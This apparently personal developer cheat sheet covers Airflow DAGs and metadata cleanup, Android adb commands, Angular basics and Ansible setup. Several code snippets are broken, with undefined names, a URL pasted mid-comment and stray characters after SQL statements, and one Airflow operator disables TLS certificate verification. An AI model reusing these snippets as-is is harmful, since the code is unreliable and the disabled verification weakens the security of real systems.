from airflow.models import DAG
from airflow.operators.http_operator import SimpleHttpOperator
from airflow.operators.python import PythonOperator
from airflow.models.skipmixin import SkipMixin
import logging
import json

DAG_NAME = "data_api_call"
TASK_DATA_API_CALL = "data_api_call"
CONNECTION_ID = "data_api_connection"

def print_conf(**context):
    print(context)
    account_id=context["dag_run"].conf['account_id']
    print(f"account_id {account_id}")
    filename=context["dag_run"].conf['filename']
    print(f"filename {filename}")

# alternative way of reading input parameters
request_account="{{ dag_run.conf['account_id']  }}"

with DAG(DAG_NAME,
         description='collaboration with data api',
         schedule_interval=None,
         start_date=datetime(2018, 11, 1),
         catchup=False) as dag:

    def print_input_parameters():
        return PythonOperator(task_id="print_input_variables", python_callable=print_conf, provide_context=True)

    def data_api_call(connection_id=CONNECTION_ID):
        return SimpleHttpOperator(
            task_id=TASK_DATA_API_CALL
            , http_conn_id=CONNECTION_ID
            , method="GET"
            , endpoint=f"/session-lister/v1/version?{request_account}"
            # data="{\"id\":111333222}"
            # response will be pushed to xcom with COLLABORATION_TASK_ID
            # , xcom_push=True
            , log_response=True
            , extra_options={"verify": False, "cert": None}
        )

    print_input_parameters() >> data_api_call()
  • reading settings files ( dirty way )
# settings.json should be placed in the same folder as dag description
# configuration shoulhttps://github.com/cherkavi/cheat-sheet/blob/master/development-process.md#concurrency-vs-parallelismd contains: dags_folder = /usr/local/airflow/dags
def get_request_body():
    with open(f"{str(Path(__file__).parent.parent)}/dags/settings.json", "r") as f:
        request_body = json.load(f)
        return json.dumps(request_body)
COLLABORATION_TASK_ID="mydag_first_call"

def status_checker(resp):
    job_status = resp.json()["status"]
    return job_status in ["SUCCESS", "FAILURE"]

def cleanup_response(response):
    return response.strip()

def create_http_operator(connection_id=MYDAG_CONNECTION_ID):
    return SimpleHttpOperator(
        task_id=COLLABORATION_TASK_ID,
        http_conn_id=connection_id,
        method="POST",
        endpoint="v2/endpoint",
        data="{\"id\":111333222}",
        headers={"Content-Type": "application/json"},
        # response will be pushed to xcom with COLLABORATION_TASK_ID
        xcom_push=True,
        log_response=True,
    )


def second_http_call(connection_id=MYDAG_CONNECTION_ID):
    return HttpSensor(
        task_id="mydag_second_task",
        http_conn_id=connection_id,
        method="GET",
        endpoint="v2/jobs/{{ parse_response(ti.xcom_pull(task_ids='" + COLLABORATION_TASK_ID + "' )) }}",
        response_check=status_checker,
        poke_interval=15,
        depends_on_past=True,
        wait_for_downstream=True,
    )


with DAG(
    default_args=default_args,
    dag_id="dag_name",
    max_active_runs=1,
    default_view="graph",
    concurrency=1,
    schedule_interval=None,
    catchup=False,
    # custom function definition
    user_defined_macros={"parse_response": cleanup_response},
) as dag:
    first_operator = first_http_call()
    second_operator = second_http_call()
    first_operator >> second_operator
  • avoid declaration of Jinja inside parameters
    # api_endpoint = "{{ dag_run.conf['session_id'] }}"
    maprdb_read_session_metadata = SimpleHttpOperator(
        task_id=MAPRDB_REST_API_TASK_ID,
        method="GET",
        http_conn_id="{{ dag_run.conf['session_id'] }}",
	# sometimes not working and need to create external variable like api_endpoint !!!!
        endpoint="{{ dag_run.conf['session_id'] }}",
        data={"fields": [JOB_CONF["field_name"], ]},
        log_response=True,
        xcom_push=True
  • logging, log output, print log
import logging
logging.info("some logs")
  • logging for task, task log
 task_instance = context['ti']
 task_instance.log.info("some logs for task")
  • execute list of tasks from external source, subdag, task loop
def trigger_export_task(session, uuid, config):
    def trigger_dag(context: Dict, dag_run: DagRunOrder) -> DagRunOrder:
        dag_run.payload = config
        return dag_run

    return AwaitableTriggerDagRunOperator(
        trigger_dag_id=DAG_ID_ROSBAG_EXPORT_CACHE,
        task_id=f"{session}_{uuid}",
        python_callable=trigger_dag,
        trigger_rule=TriggerRule.ALL_DONE,
    )

# DAG Definition
with DAG(
    dag_id=DAG_NAME_WARMUP_ROSBAG_EXPORT_CACHE,
    default_args={"start_date": datetime(2020, 4, 20), **DEFAULT_DAG_PARAMS},
    default_view="graph",
    orientation="LR",
    doc_md=__doc__,
    schedule_interval=SCHEDULE_DAILY_AFTERNOON,
    catchup=False,
) as dag:
    # generate export configs
    dag_modules = _get_dag_modules_containing_sessions()
    export_configs = _get_configs(dag_modules, NIGHTLY_SESSION_CONFIG)

    # generate task queues/branches
    NUM_TASK_QUEUES = 30
    task_queues = [[] for i in range(NUM_TASK_QUEUES)]

    # generate tasks (one task per export config) and assign them to queues/branches (rotative)
    for i, ((session, uuid), conf) in enumerate(export_configs.items()):
        queue = task_queues[i % NUM_TASK_QUEUES]
        queue.append(trigger_export_task(session, uuid, conf))

        # set dependency to previous task
        if len(queue) > 1:
            queue[-2] >> queue[-1]
with DAG(default_args=DAG_DEFAULT_ARGS,
         dag_id=DAG_CONFIG['dag_id'],
         schedule_interval=DAG_CONFIG.get('schedule_interval', None)) as dag:

    def return_branch(**kwargs):
        """
	start point (start task) of the execution 
	( everything else after start point will be executed )
	"""
        decision = kwargs['dag_run'].conf.get('branch', 'run_markerers')
        if decision == 'run_markerers':
            return 'run_markerers'
        if decision == 'merge_markers':
            return 'merge_markers'
        if decision == 'index_merged_markers':
            return 'index_merged_markers'
        if decision == 'index_single_markers':
            return 'index_single_markers'
        if decision == 'index_markers':
            return ['index_single_markers', 'index_merged_markers']
        else:
            return 'run_markerers'


    fork_op = BranchPythonOperator(
        task_id='fork_marker_jobs',
        provide_context=True,
        python_callable=return_branch,
    )

    run_markerers_op = SparkSubmitOperator(
        task_id='run_markerers',
        trigger_rule='none_failed',
    )

    merge_markers_op = SparkSubmitOperator(
        task_id='merge_markers',
        trigger_rule='none_failed',
    )

    index_merged_markers_op = SparkSubmitOperator(
        task_id='index_merged_markers',
        trigger_rule='none_failed',
    )

    index_single_markers_op = SparkSubmitOperator(
        task_id='index_single_markers',
        trigger_rule='none_failed',
    )

    fork_op >> run_markerers_op >> merge_markers_op >> index_merged_markers_op
    run_markerers_op >> index_single_markers_op
  • access to dag runs, access to dag instances, set dags state
from airflow.models import DagRun
from airflow.operators.python_operator import PythonOperator
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.trigger_rule import TriggerRule

@provide_session
# custom parameter for operator 
def stop_unfinished_dag_runs(trigger_task_id, session=None, **context):
    print(context['my_custom_param'])
    dros = context["ti"].xcom_pull(task_ids=trigger_task_id)
    run_ids = list(map(lambda dro: dro.run_id, dros))

    # identify unfinished DAG runs of rosbag_export
    dr = DagRun
    running_dags = session.query(dr).filter(dr.run_id.in_(run_ids), dr.state.in_(State.unfinished())).all()

    if running_dags and len(running_dags)>0:
        # set status failed
        for dag_run in running_dags:
            dag_run.set_state(State.FAILED)
        print("set unfinished DAG runs to FAILED")


def dag_run_cleaner_task(trigger_task_id):
    return PythonOperator(
        task_id=dag_config.DAG_RUN_CLEAN_UP_TASK_ID,
        python_callable=stop_unfinished_dag_runs,
        provide_context=True,
        op_args=[trigger_task_id], # custom parameter for operator
    	op_kwargs={"my_custom_param": 5}
    )
  • python operator new style
from airflow.operators.python import get_current_context	
	
@task
def image_set_variant():
    context = get_current_context()
    task_instance = context["ti"]
	

with DAG(DAG_NAME,
         start_date=datetime(2015, 12, 1),
         catchup=False,
         schedule_interval=None
         ) as dag:
    image_set_variant()
  • trig and wait, run another dag and wait
from airflow.models import BaseOperator
from airflow.operators.dagrun_operator import DagRunOrder

from airflow_common.operators.awaitable_trigger_dag_run_operator import \
    AwaitableTriggerDagRunOperator
from airflow_dags_manual_labeling_export.ad_labeling_export.config import \
    dag_config


def _run_another(context, dag_run_obj: DagRunOrder):
    # config from parent dag run
    config = context["dag_run"].conf.copy()
    config["context"] = dag_config.DAG_CONTEXT
    dag_run_obj.payload = config

    dag_run_obj.run_id = f"{dag_config.DAG_ID}_triggered_{context['execution_date']}"
    return dag_run_obj


def trig_another_dag() -> BaseOperator:
    """
    trig another dag
    :return: initialized TriggerDagRunOperator
    """
    return AwaitableTriggerDagRunOperator(
        task_id="task_id",
        trigger_dag_id="dag_id",
        python_callable=_run_another,
        do_xcom_push=True,
    )
  • read input parameters from REST API call
DAG_NAME="my_dag"
PARAM_1="my_own_param1"
PARAM_2="my_own_param2"
ENDPOINT="https://prod.airflow.vantage.zur/api/experimental/dags/$DAG_NAME/dagRuns"
BODY='{"configuration_of_call":{"parameter1":"'$PARAM_1'","parameters2":"'$PARAM_2'"}}'
curl --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
decision = context['dag_run'].configuration_of_call.get('parameter1', 'default_value')

read system configuration

from airflow.configuration import conf
# Secondly, get the value somewhere
conf.get("core", "my_key")

# Possible, set a value with
conf.set("core", "my_key", "my_val")
  • sensor example
SensorFile(
  task_id="sensor_file",
  fs_conn_id="filesystem_connection_id_1", # Extras should have: {"path":"/path/to/folder/where/file/is/"}
  file_path="my_file_name.txt"
)
  • smart skip, skip task
from airflow.models import DAG
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.models.skipmixin import SkipMixin

class SelectOperator(PythonOperator, SkipMixin):

    def _substract_by_taskid(self, task_list, filtered_ids):
        return filter( lambda task_instance: task_instance.task_id not in filtered_ids, task_list);

    def execute(self, context):
        condition = super().execute(context)
        # self.skip(context['dag_run'], context['ti'].execution_date, downstream_tasks)

        self.log.info(">>>  SelectOperator")
        self.log.info(">>> Condition %s", condition)
        downstream_tasks = context['task'].get_flat_relatives(upstream=False)
	
        # self.log.info(">>> Downstream task_ids %s", downstream_tasks)
        # filtered_tasks = list(self._substract_by_taskid(downstream_tasks, condition))
        # self.log.info(">>> Filtered task_ids %s", filtered_tasks)
        # self.skip(context['dag_run'], context['ti'].execution_date, filtered_tasks)        
        
        self.skip_all_except(context['ti'], condition)
        self.log.info(">>>>>>>>>>>>>>>>>>>")

with DAG('autolabelling_example', description='First DAG', schedule_interval=None, start_date=datetime(2018, 11, 1), catchup=False) as dag:
    def fork_label_job_branch(**context):
        return ['index_single_labels']        

    fork_operator = SelectOperator(task_id=FORK_LABEL_TASK_ID, provide_context=True, python_callable=fork_label_job_branch)

providers vs extras

Providers

pip install apache-airflow-providers-presto

Plugins

official documentation
examples of airflow plugins

  • Operators: They describe a single task in a workflow. Derived from BaseOperator.
  • Sensors: They are a particular subtype of Operators used to wait for an event to happen. Derived from BaseSensorOperator
  • Hooks: They are used as interfaces between Apache Airflow and external systems. Derived from BaseHook
  • Executors: They are used to actually execute the tasks. Derived from BaseExecutor
  • Admin Views: Represent base administrative view from Flask-Admin allowing to create web interfaces. Derived from flask_admin.BaseView (new page = Admin Views + Blueprint )
  • Blueprints: Represent a way to organize flask application into smaller and re-usable application. A blueprint defines a collection of views, static assets and templates. Derived from flask.Blueprint (new page = Admin Views + Blueprint )
  • Menu Link: Allow to add custom links to the navigation menu in Apache Airflow. Derived from flask_admin.base.MenuLink
  • Macros: way to pass dynamic information into task instances at runtime. They are tightly coupled with Jinja Template.

plugin template

# init.py

from airflow.plugins_manager import AirflowPlugin
from elasticsearch_plugin.hooks.elasticsearch_hook import ElasticsearchHook

# Views / Blueprints / MenuLinks are instantied objects
class MyPlugin(AirflowPlugin):
	name 			= "my_plugin"
	operators 		= [MyOperator]
	sensors			= []
	hooks			= [MyHook]
	executors		= []
	admin_views		= []
	flask_blueprints	= []
	menu_links		= []
my_plugin/
├── __init__.py
├── hooks
│   ├── my_hook.py
│   └── __init__.py
├── menu_links
│   ├── my_link.py
│   └── __init__.py
├── operators
    ├── my_operator.py
    └── __init__.py

Maintenance

Metedata cleanup

-- https://github.com/teamclairvoyant/airflow-maintenance-dags/blob/master/db-cleanup/airflow-db-cleanup.py

-- "airflow_db_model": BaseJob.latest_heartbeat,
select count(*) from job where latest_heartbeat < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "airflow_db_model": DagRun.execution_date,
select count(*) from dag_run where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "airflow_db_model": TaskInstance.execution_date,
select count(*) from task_instance where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "airflow_db_model": Log.dttm,
select count(*) from log where dttm < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": XCom.execution_date,
select count(*) from xcom where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": SlaMiss.execution_date,
select count(*) from sla_miss where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": TaskReschedule.execution_date,
select count(*) from task_reschedule where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": TaskFail.execution_date,
select count(*) from task_fail where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": RenderedTaskInstanceFields.execution_date,
select count(*) from rendered_task_instance_fields where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;


-----------------------------------------------------------------------------------------------------------
-- metadata redundant records check 
select count(*) from job where latest_heartbeat < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from dag_run where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from task_instance where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from log where dttm < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from xcom where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from sla_miss where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from task_reschedule where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from task_fail where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from rendered_task_instance_fields where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- metadata cleanup database cleaning										       
delete from job where latest_heartbeat < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from dag_run where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from task_instance where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from log where dttm < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from xcom where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from sla_miss where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from task_reschedule where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from task_fail where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y
delete from rendered_task_instance_fields where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;y

Issues

404 during REST API request

<title>Airflow 404 = lots of circles</title>

solution is: change airflow.cfg auth_backend = airflow.api.auth.backend.default auth_backend = airflow.api.auth.backend.basic_auth

Architecture examples

shopify
e-commerce
celery worker on AWS
airflow-centric solution

Android development cheat sheet

connect phone to a computer ( Linux )

for reading links like: mtp://motorola_moto_g52_xxxxxx Settings -> Connected devices -> USB

  • Use USB for: File Transfer
  • Optional: USB controlled by connected device

PC software for managing Android device

Odin

Odin for Linux

  1. install heimdall
    ubuntu_version=$(lsb_release -rs | cut -d. -f1)
    if [ "$ubuntu_version" -ge 22 ]; then 
        sudo apt install heimdall-flash heimdall-flash-frontend
        heimdall print-pit
    fi
  2. download release of JOdin3 and run JOdin3CASUAL
    soft; mkdir odin3; cd odin3
    wget https://github.com/GameTheory-/jodin3/releases/download/v1.0/Jodin3.zip
    unzip Jodin3.zip
    ls -la Jodin3/JOdin3CASUAL

Android Debug Bridge creates a connection (bridge) between the device and computer. should be activated:

  1. developer mode Settings -> About phone -> build number -> type 5 times on it
  2. USB debug Settings -> find word "develop" -> activate "USB debugging"

adb install via Debian APT

sudo apt -y install adb
adb version
adb devices

copy files

adb push test.apk /sdcard
adb pull /sdcard/demo.mp4 e:\

restart device in recovery mode

adb reboot
adb reboot recovery

list of all applications/packages

adb shell pm list packages -f
# list of all installed applications with name of packages
adb shell pm list packages -f | awk -F '.apk=' '{printf "%-60s | %s\n", $2, $1}' | sort
# list of all non-system/installed applications
# | grep -v "package:/system" | grep -v "package:/vendor" | grep -v "package:/product" | grep -v "package:/apex"
adb shell pm list packages -f | awk -F '.apk=' '{printf "%-60s | %s\n", $2, $1}' | grep "package:/data/app/" | sort

# package_name=org.mozilla.firefox
# x-www-browser https://play.google.com/store/search?q=${package_name}&c=apps

# adb shell; 
# pm list packages -f

permission by package

PACKAGE_NAME=com.google.android.youtube
adb shell dumpsys package $PACKAGE_NAME | grep -i permission | grep -i granted=true

list of all permissions

adb shell pm list permissions

list of all features

adb shell pm list features
# print one file from OS
adb shell cat /proc/cpuinfo

# https://source.android.com/docs/core/architecture/bootloader/locking_unlocking
adb shell getprop | grep oem
adb shell getprop sys.oem_unlock_allowed
adb shell setprop sys.oem_unlock_allowed 1
# dmesg -wH

list of all settings

adb shell service list
adb shell settings list --user current secure 
adb shell settings get secure location_providers_allowed
adb shell settings get secure enabled_accessibility_services

send keyboard event

adb shell input keyevent KEYCODE_HOME

# KEYCODE_A: A
# KEYCODE_B: B
# KEYCODE_ENTER: Enter
# KEYCODE_SPACE: Space
# KEYCODE_BACK: Back button
# KEYCODE_HOME: Home button

works only in "bootloader" or "fastboot" or "download" mode. boot your Android device into the bootloader mode

fastboot install via Debian APT

sudo apt -y install fastboot
fastboot version

check connected phone

sudo apt install adb 

adb devices

lsusb
# Bus 001 Device 013: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy A5 (MTP)

fix issue with root:root usb access

ls -l /dev/bus/usb/001/013
# crw-rw-r--+ 1 root plugdev 189, 10 Mai 21 13:50 /dev/bus/usb/001/011

# if group is root, not a plugdev
sudo vim /etc/udev/rules.d/51-android.rules
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", ATTR{idProduct}=="6860", MODE="0660", GROUP="plugdev", SYMLINK+="android%n"

sudo service udev status

decompilation, opening Android apk

download latest release

GIT_ACCOUNT=skylot
GIT_PROJECT=jadx
version=`wget -v https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest/download/$GIT_RELEASE_ARTIFACT 2>&1 | grep following | awk '{print $2}' | awk -F '/' '{print $8}'`
GIT_RELEASE_ARTIFACT=jadx-${version:1}.zip
wget -v https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest/download/$GIT_RELEASE_ARTIFACT

start gui

./bin/jadx-gui

adb usage

print all applications with full set of granted permissions

for each_app in `adb shell pm list packages -f | grep 'package:/data/app' | awk -F 'base.apk=' '{print $2}' | sort `; do
    echo ">>> $each_app"
    # each_app=com.google.android.youtube
    # adb shell pm dump $each_app | clipboard
    adb shell pm dump $each_app | awk '/runtime permissions:/,/disabledComponents:/ { if ($0 ~ /disabledComponents:/ || $0 ~ /enabledComponents:/) exit; else print }' | grep "granted=true"
    echo ""
done

Angular cheat sheet

install nodejs

# download and unpack to $destionation folder https://nodejs.org/en/
destination_folder=/home/soft/node2
wget -O node.tar.xz https://nodejs.org/dist/v10.16.3/node-v10.16.3-linux-x64.tar.xz
tar -xf node.tar.xz -C $destination_folder
# update /etc/environment with $destination_folder

npm config

$HOME/.npmrc - another way to extend settings per user

# list of configuration
npm config list
# full config list with default settings
npm config ls -l
# set proxy 
npm config set proxy http://<username>:<pass>@proxyhost:<port>
npm config set https-proxy http://<uname>:<pass>@proxyhost:<port>

docker container with Angular attach to your current folder and build your application

+---------+
| source  +-----------+
|  /app   |           |
+----^----+    +------v----+
     V         | docker:   |
     |         | * node    |
     |         | * angular |
 +---+---+     +-----+-----+
 | dest  |           |
 | build <-----------+
 +-------+
  1. build your docker with dependencies
NODE_VERSION=16.15.0
    # NODE_VERSION=latest # you can select last version for it
docker pull node:$NODE_VERSION 
docker run --entrypoint="" --rm --name "npm_angular" --interactive --tty node:$NODE_VERSION  /bin/sh 

    # (optional)
    # ------- inside container -------
    ## install angular 
npm install -g @angular/cli    
npm install -g @angular/cli@12
    # check your installation 
ng --version

    ## install typescript
npm install -g typescript  
tsc --version

    ## install yarn
npm install --global yarn
yarn --version
  1. (optional) save your docker container with installed artifacts
DOCKER_IMAGE_ANGULAR=node-with-angular
# in another terminal 
CONTAINER_ID=`docker ps | grep 'npm_angular' | awk '{print $1}'`
echo $CONTAINER_ID
docker commit $CONTAINER_ID $DOCKER_IMAGE_ANGULAR
docker images
  1. start saved container in your application folder (folder with )
DOCKER_IMAGE_ANGULAR=node-with-angular
docker run --entrypoint="" --interactive --tty -p 4200:4200  -v `pwd`:/app $DOCKER_IMAGE_ANGULAR  /bin/sh 
  1. build application inside your container
    # after step 3.
PATH_TO_PROJECT_LOCAL=/app
    # ls -la $PATH_TO_PROJECT_LOCAL/package.json
cd $PATH_TO_PROJECT_LOCAL
sudo rm -rf node_modules

npm install
    # /usr/local/lib/node_modules/npm/bin/npm 
    # npm build # for version<6.x.x
npm pack

Start of application

core conceptions

  • modular architecture
    • Angular architecture patterns
    • Scalable Angular application architecture
  • one way data-flow
    • Angular data flow best practices
    • Uni-directional flow in Angular
    • Advantages of one way binding
  • directives
    • Angular attribute directives
    • Angular structural directives
    • Angular structural directive patterns
  • components lifecycle
    • Angular life cycle hook
    • Component life cycle
  • http services
    • JavaScript observable patterns
    • Angular HTTP and observables
    • ES7 observable feature
  • smart/dumb components
    • Smart/dumb Angular components
    • Stateless dumb components
    • Presentational components
    • Smart components in Angular
  • application structure
    • Single repo Angular apps
    • Angular libraries
    • Angular packages
    • Angular bundles
    • Angular micro apps
    • Monorepo
  • property binding
    • Angular property binding
    • Angular event binding
    • Angular two-way binding
    • Angular interpolation
    • Angular passing constants
  • feature modules
    • Angular feature modules
    • Shared feature structures in Angular
    • Feature module providers
    • Lazy loading with routing and feature modules
  • forms
    • Angular form validation
    • Template driven validation
    • Reactive form validation
    • Sync and async validators in Angular
    • Built-in validators
    • Angular custom validators
    • Cross-field validation
  • projection
    • Angular content projection
    • Angular parent-child view relationship
    • Angular view data relationships
  • onPush
    • Angular onPush change detection
  • route access restrictions
    • Angular route guards
    • Angular authentication patterns
    • Angular preloading and lazy-loading modules
    • Angular secured route patterns
  • Angular custom pipes
  • decorators
    • Angular decorators
    • Viewchild and contentchild in Angular
    • Angular component data sharing
    • Angular directives patterns
    • @Host, @HostBinding and exportAs in Angular
  • dynamic components
    • Dynamic components in Angular
    • Dynamic components and ng-templating
  • manage state of application
    • Angular RxJs
    • Flux/Redux principles
    • Angular state management principles
  • Dependency injection
    • Angular zones
    • Angular DI

angular cli

create new project

ng new my-new-project

start a project

cd my-new-project
# open in VisualCode just generated project ```code .```
# start locally 
ng serve
# start on specific port
ng serve --port 2222
# start and open browser
ng serve --open

build a project

ng build
ng build --prod
ng build --prod --base-href http://your-url
ng g component my-new-component
ng generate component my-new-component

create service

  • generate by cli
    ng generate service myService
  • create dummy data "src/app/my-service.service.ts"
    data=[9,8,7,6,5]
  • update "src/app/app.module.ts"
    import { MyServiceService } from './my-service.service';
    ...
    providers: [MyServiceService],

using it in model "src/app/my-component/my-component.component.ts"

import { MyServiceService } from '../my-service.service';
...
template: `
  <div>{{ this.externalService.data }}</div>
  <div>{{ this.mydata }}</div>
`,
...
export class MyComponentComponent implements OnInit{
mydata:number[]
  ngOnInit(): void {
    this.mydata = this.externalService.data
  }
  constructor(private externalService:MyServiceService){}
}

angular templates

inline template

@Component({
  selector: 'app-my-component',
  // templateUrl: './my-component.component.html',
  template: `
  <b>my-component</b> <br/>
  `,
  styleUrls: ['./my-component.component.css']
})

for loop

@Component({
  selector: 'app-my-component',
  template: `
  <b>my-component</b> <br/>
  <i>is working inline ->{{description.title+"   "+description.values}}<- </i>
  <ul>
    <li *ngFor="let each of description.values; let index = index">{{ index }} {{ each }}</li>
  </ul>
  `,
  styleUrls: ['./my-component.component.css']
})

export class MyComponentComponent {
  description:object

  constructor() { 
    this.description={
      title: "my custom properties",
      values: [5,7,9,11,13]
    }
    
  }
}

alternative template

@Component({
  selector: 'app-my-component',
  template: `
  <div *ngIf="description.customTemplate==true; else myAnotherTemplate">{{ description.values}}</div>  

  <ng-template #myAnotherTemplate>
    <ul><li *ngFor="let each of description.values"> {{ each }} </li></ul>
  </ng-template>
  `,
  styleUrls: ['./my-component.component.css']
})

export class MyComponentComponent {
  description:object
  constructor() { 
    this.description={
      title: "my custom properties",
      customTemplate: false,
      values: [5,7,9,11,13]      
    }    
  }

}

Property binding

Component --data--> View

<img src="{{ myProperty }}" >

<img [src]="myProperty" >
<button [disabled]="myProperty=='not-active-now'" >

<img bind-src="myProperty" >

Events binding

View --event--> Component

@Component({
  selector: 'app-my-component',
  template: `
    <button (click)="myEvent($event)">click event</button>
  `,
  styleUrls: ['./my-component.component.css']
})

export class MyComponentComponent {
  myEvent(event:MouseEvent){
    console.log(event)
    window.alert(event)
  }
}

Styles

inline style

@Component({
  selector: 'app-my-component',
  template: `
    <button>my button</button>
  `,
  styles: [`
   button {
     font-weight: bold;
     color: red;
   }
  `]
})

Animation

installation

 npm install @angular/animations@latest --save

component

import { trigger, state, style, transition, animate, keyframes } from '@angular/animations'

@Component({
  selector: 'app-root',
  templateUrl: './app.component.html',
  styleUrls: ['./app.component.css'],
  animations: [
    trigger('myOwnAnimation',
            [
            state('small', style({transform: 'scale(1)'})),
            state('bigger', style({transform: 'scale(2)'})),
            transition(
              'small <=> bigger', 
              animate('300ms', style({transform: 'translateY(100px)'}))
            )
            ]
    )
  ]
})
export class AppComponent {
  state: string = "small"
  animateMe(){
    this.state = (this.state === 'small'? 'bigger' : "small")
  }
}

template

    <p [@myOwnAnimation]='state'  (click)="animateMe()" style="text-align: center"> animation</p>

Test

execute single test

ng test --include='**/service/*.spec.ts'
npm run test -- --include='**/service/*.spec.ts'

UX tools

  • Axure (Prototyping)
  • Sketch (UI Design)
  • Adobe Illustrator

agentless, connect via ssh to remote machine(s)

installation

yum install ansible
apt install ansible
pip3 install ansible 
# for python2 - default installation 
pip install ansible

remote machine should have 'python' - 'gather_facts: False' or 'gather_facts: no' otherwise

uninstall

rm -rf $HOME/.ansible
rm -rf $HOME/.ansible.cfg
sudo rm -rf /usr/local/lib/python2.7/dist-packages/ansible
sudo rm -rf /usr/local/lib/python2.7/dist-packages/ansible-2.5.4.dist-info
sudo rm -rf /usr/local/bin/ansible
sudo rm -rf /usr/local/bin/ansible-config
sudo rm -rf /usr/local/bin/ansible-connection
sudo rm -rf /usr/local/bin/ansible-console
sudo rm -rf /usr/local/bin/ansible-doc
sudo rm -rf /usr/local/bin/ansible-galaxy
sudo rm -rf /usr/local/bin/ansible-inventory
sudo rm -rf /usr/local/bin/ansible-playbook
sudo rm -rf /usr/local/bin/ansible-pull
sudo rm -rf /usr/local/bin/ansible-vault
sudo rm -rf /usr/lib/python2.7/dist-packages/ansible
sudo rm -rf /usr/local/lib/python2.7/dist-packages/ansible

ansible configuration places

  • environment variables
  • ansible.cfg file:
    • env variable with file $ANSIBLE_CONFIG ( point out to ansible.cfg )
    • ~/.ansible.cfg
    • /etc/ansible/ansible.cfg
# show current config file 
ansible-config view
# description of all ansible config variables
ansible-config list
# list of possible environment variables
ansible-config dump

configuration for external roles

filename: ~/.ansible.cfg

[defaults]
roles_path = ~/repos/project1/roles:~/repos/project2/roles

configuration for aws for skipping check host key

[defaults]
host_key_checking = false

check configuration

ansible-config view

inventory

without inventory inline host ip

ansible all -i desp000111.vantage.zur, --user=my_user -m "ping" -vvv

without inventory with pem ssh private ssh key

generate PEM file

ssh-keygen -t rsa -b 4096 -m PEM -f my_ssh_key.pem
ll my_ssh_key.pem

ansible all -i desp000111.vantage.zur, --user=vitalii.cherkashyn -e ansible_ssh_private_key_file=my_ssh_key.pem -m "ping" -vvv

inventory ini file

# example cfg file
[web]
host1
host2 ansible_port=222 # defined inline, interpreted as an integer

[web:vars]
http_port=8080 # all members of 'web' will inherit these
myvar=23 # defined in a :vars section, interpreted as a string

inventory dynamic inventory from any source

pip install ansible ansible-inventory

python script ( for instance my-inventory.py )

  • should generate json output:
python my-inventory.py --list
{
    "group1": {
        "hosts": ["host1", "host2"],
        "vars": {
            "ansible_user": "admin",
            "ansible_become": True
        },
        "children":["group2"]
    },
    "group2": {
        "hosts": ["host3"],
        "vars": {
            "ansible_user": "user",
            "ansible_become": False
        },
        "children":[]
    }
}
  • should generate json output:
python my-inventory.py --host host1
{
  "ansible_user": "admin",
  "ansible_become": True
}

How to check the script:

chmod +x my-inventory.py

ansible -i my-inventory.py all -m ping

execute with specific remote python version, remote python, rewrite default variables, rewrite variables, override variable

--extra-vars "remote_folder=$REMOTE_FOLDER ansible_python_interpreter=/usr/bin/python"

execute minimal playbook locally minimal example start simplest playbook

check-variable.yaml content:

- hosts: localhost
  tasks:
  - name: echo variable to console
    ansible.builtin.debug:
      msg: System {{ inventory_hostname }} has gateway {{ ansible_default_ipv4.gateway }}
    no_log: false

log output can be suppressed ( no log output )

ansible-playbook check-variable.yaml  -v

another example but with roles

- hosts: localhost
  user: user_temp
  roles:
    - my_own_role

execute ansible for one host only, one host, one remove server, verbosity

ansible-playbook -i "ubs000015.vantage.org , " mkdir.yaml 

ansible-playbook welcome-message.yaml -i airflow-test-account-01.ini --limit worker --extra-vars="ACCOUNT_ID=QA01" --user=ubuntu --ssh-extra-args="-i $EC2_KEY" -vvv

ansible all -i airflow-test-account-01.ini --user=ubuntu --ssh-extra-args="-i $EC2_KEY" -m "ping" -vvv
ansible main,worker -i airflow-test-account-01.ini --user=ubuntu --ssh-extra-args="-i $EC2_KEY" -m "ping"

simple file for creating one folder

- hosts: all
  tasks:
    - name: Creates directory
      file:
        path: ~/spark-submit/trafficsigns
        state: directory
        mode: 0775
    - name: copy all files from folder
      copy: 
        src: "/home/projects/ubs/current-task/nodes/ansible/files" 
